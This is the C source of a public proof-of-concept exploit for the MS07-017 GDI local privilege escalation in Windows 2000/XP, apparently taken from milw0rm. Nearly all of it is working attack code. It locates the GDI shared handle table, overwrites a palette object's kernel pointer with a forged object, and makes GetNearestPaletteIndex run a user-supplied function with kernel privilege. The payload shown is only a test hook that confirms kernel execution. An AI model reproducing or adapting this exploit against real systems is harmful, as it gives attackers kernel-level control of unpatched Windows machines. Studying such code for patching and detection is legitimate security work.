/* GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017) Coded by Lionel d'Hauenens http://www.labo-asso.com Development: ------------ Dev-C++ Linked with /lib/libgdi32.a References: ----------- http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx http://research.eeye.com/html/alerts/zeroday/20061106.html http://www.milw0rm.com/exploits/3688 http://ivanlef0u.free.fr/?p=41 March 16, 2007 */ #include #include #include typedef enum _SECTION_INFORMATION_CLASS { SectionBasicInformation, SectionImageInformation } SECTION_INFORMATION_CLASS; typedef struct _SECTION_BASIC_INFORMATION { ULONG Base; ULONG Attributes; LARGE_INTEGER Size; } SECTION_BASIC_INFORMATION; typedef struct _GDI_TABLE_ENTRY { PVOID pKernelInfo; WORD ProcessID; WORD _nCount; WORD nUpper; BYTE nType; BYTE flags; PVOID pUserInfo; } GDI_TABLE_ENTRY, *PGDI_TABLE_ENTRY; typedef DWORD (WINAPI* NTQUERYSECTION)(HANDLE, ULONG, PVOID,ULONG,PULONG); NTQUERYSECTION NtQuerySection; #define INT3 asm (".intel_syntax noprefix"); __asm ("int 3"); asm (".att_syntax noprefix"); #define STATUS_SUCCESS 0 #define PAL_TYPE 8 DWORD flag_test; hook (HANDLE pal, COLORREF couleur) { // INT3 // Executed code with kernel privilege asm (".intel_syntax noprefix"); __asm ("cli"); // it's the fiesta !!! :) __asm ("sti"); asm (".att_syntax noprefix"); flag_test = 1; return (TRUE); } int main(int argc, char *argv[]) { SECTION_BASIC_INFORMATION SectionInfo; PGDI_TABLE_ENTRY pGdiEntry; PLOGPALETTE pLogPal; HANDLE hPal; PVOID OriginalPalObject; PVOID FalsePalObject; HANDLE hThread = GetCurrentThread(); DWORD OriginalThreadPriotity = GetThreadPriority (hThread); HANDLE hSection = (ULONG)0; PVOID MapFile = 0; HANDLE hProcess = (HANDLE)0xFFFFFFFF; WORD Pid = GetCurrentProcessId(); NtQuerySection = (NTQUERYSECTION)GetProcAddress(LoadLibrary( "ntdll.dll"),"NtQuerySection"); printf ("##########################################################\n"); printf ("# GDI Local Elevation of Privilege Vulnerability Exploit #\n"); printf ("# All Windows 2000/XP before MS07-017 patch #\n"); printf ("##########################################################\n"); printf ("# coded by Lionel d'Hauenens http://www.labo-asso.com #\n"); printf ("##########################################################\n\n"); // Search handle section and mapper in virtual memory of user while ((DWORD)hSection<0xFFFF) { SectionInfo.Attributes = 0; MapFile = MapViewOfFile((HANDLE)hSection, FILE_MAP_ALL_ACCESS, 0, 0, 0); if (MapFile) { NtQuerySection((HANDLE)hSection,0,&SectionInfo,sizeof(SectionInfo),0); if (SectionInfo.Attributes == SEC_COMMIT) break; // For compatibility with win2k UnmapViewOfFile(MapFile); MapFile = 0; } hSection++; } if (!MapFile) { printf ("Could not found shared section !\n"); exit(0); } // Create Palette pLogPal = (PLOGPALETTE) calloc (sizeof(LOGPALETTE)+sizeof(PALETTEENTRY), 1); pLogPal->palNumEntries = 1; pLogPal->palVersion = 0x300; hPal = (HANDLE)CreatePalette(pLogPal); if (!hPal) { printf ("Could not create palette !\n"); exit(0); } // Search the entry of pal object OriginalPalObject = (PVOID)0; pGdiEntry = (PGDI_TABLE_ENTRY)MapFile; while ((DWORD)pGdiEntry < ((DWORD)MapFile) + SectionInfo.Size.QuadPart) { if ( pGdiEntry->ProcessID == Pid && pGdiEntry->nType == PAL_TYPE ) { // Save original pointer OriginalPalObject = (PVOID)pGdiEntry->pKernelInfo; break; } pGdiEntry++; } if (!OriginalPalObject) { printf ("Could not find entry of Pal object !\n"); exit(0); } // Create the false Pal object FalsePalObject = (PVOID) calloc(0x100/4,4); ((PDWORD)FalsePalObject)[0] = (DWORD)hPal; // Handle ((PDWORD)FalsePalObject)[0x14/4] = (DWORD) 1; // Availabled flag ((PVOID*)FalsePalObject)[0x3C/4] = (PVOID) &hook; // Interface GetNearestPaletteIndex printf ("Section:\n--------\n"); printf ("Handle: 0x%08X Attributes: %08X Size: 0x%08X\n\n", hSection , SectionInfo.Attributes , SectionInfo.Size.QuadPart); printf ("Pointer of original pal object: 0x%08X\n", OriginalPalObject); printf ("Address of user map: 0x%08X\n", MapFile); printf ("Pointer of false pal object: 0x%08X\n", FalsePalObject); printf ("Entry of GDI palette in user view: 0x%08X\n", MapFile+((((ULONG)hPal) & 0xFFFF)*sizeof(GDI_TABLE_ENTRY)) ); printf ("Address of Hook(): 0x%08X\n\n", &hook); ////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////// printf ("->Test..."); flag_test = 0; SetThreadPriority (hThread, THREAD_PRIORITY_HIGHEST); // Active false Pal object pGdiEntry->pKernelInfo = FalsePalObject; GetNearestPaletteIndex (hPal, 0); //--> call hook() with kernel privilege :); // Restore original Pal object pGdiEntry->pKernelInfo = OriginalPalObject; SetThreadPriority (hThread,OriginalThreadPriotity); ////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////// if (!flag_test) printf ("ERROR !!!\n"); else printf ("OK :)\n"); UnmapViewOfFile(MapFile); DeleteObject ((HANDLE)hPal); free((PVOID)pLogPal); free((PVOID)FalsePalObject); system("PAUSE"); return (0); } // milw0rm.com [2007-04-17]